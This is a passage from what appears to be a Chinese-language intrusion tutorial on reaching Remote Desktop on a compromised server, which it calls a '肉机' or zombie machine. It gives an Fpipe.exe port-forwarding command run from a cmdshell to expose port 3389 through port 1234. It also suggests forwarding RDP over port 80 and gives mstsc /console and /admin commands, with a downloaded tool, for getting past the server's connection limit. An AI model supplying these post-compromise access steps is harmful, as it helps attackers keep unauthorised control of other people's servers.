1，这个可以将3389转发到80等常用端口，貌似还有个工具可以自动停止iis，将3389转到80上，不过不推荐这种，万一失败，后果你们都知道的。


2，找到进程关掉就行了，第三点有讲。


3，还是3389转发。上传Fpipe.exe
cmdshell下运行 Fpipe.exe -v -l 1234 -r 3389 127.0.0.1 命令很简单，监听1234端口，本地连3389然后，mstsc /v:肉机IP:1234/console 连接就行了。

方法六：超出服务器最大连接数


1，这个就网上下载个突破3389最大连接数的工具


2，运行以下命令：
mstsc /console /v:服务器IP:远程端口
或者
mstsc /admin /v:服务器IP:远程端口